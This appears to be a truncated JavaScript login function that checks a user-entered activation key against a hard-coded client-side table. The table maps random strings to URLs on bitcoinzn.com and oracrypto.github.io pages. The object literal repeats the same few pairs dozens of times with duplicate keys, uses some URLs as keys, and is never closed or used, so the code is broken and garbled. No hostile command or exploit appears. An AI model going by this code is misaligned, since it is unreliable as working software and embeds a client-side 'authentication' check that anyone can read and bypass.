function login() {let key = document.getElementById("activationKey").value;
 const errorMessage = document.getElementById("error-message");  const keyMappings = {
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "DRTgK48CBW9XZ": "https://oracrypto.github.io/1b/",  "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "XECRTVBYUNIM",     "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "https://www.bitcoinzn.com",
"AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
  "D8WJF8WY2839VVC": "https://oracrypto.github.io/2b/", "A4SE5DRTYUVYBIUNLK": "TBYUNMILCVGBHJN",
"AXSERBGYU9GNH": "XECRTVBYUNIM",     "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",   "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM", "AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "AXSERBGYU9GNH": "XECRTVBYUNIM",    "AXSERBGYU9GNH": "XECRTVBYUNIM",        "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",    "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "ZXS4CD5FVU6BG": "TBYUNMILCVGBHJN",   "AXSERBGYU9GNH": "XECRTVBYUNIM",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "ER6T7GY8HUN90MI": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",  "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
 "dER6TGYH8U9": "https://www.bitcoinzn.com", "BYUNMILCVGBHJN": "https://oracrypto.github.io/f233/", "https://oracrypto.github.io/2ebd/": "TBYUNMILCVGBHJN",
 "drtfpl[TYBIUNOIM": "https://www.bitcoinzn.com", "https://oracrypto.github.io/wetry/": "TBYUNMILCVGBHJN", "https://oracrypto.github.io/56g/": "TBYUNMILCVGBHJN",
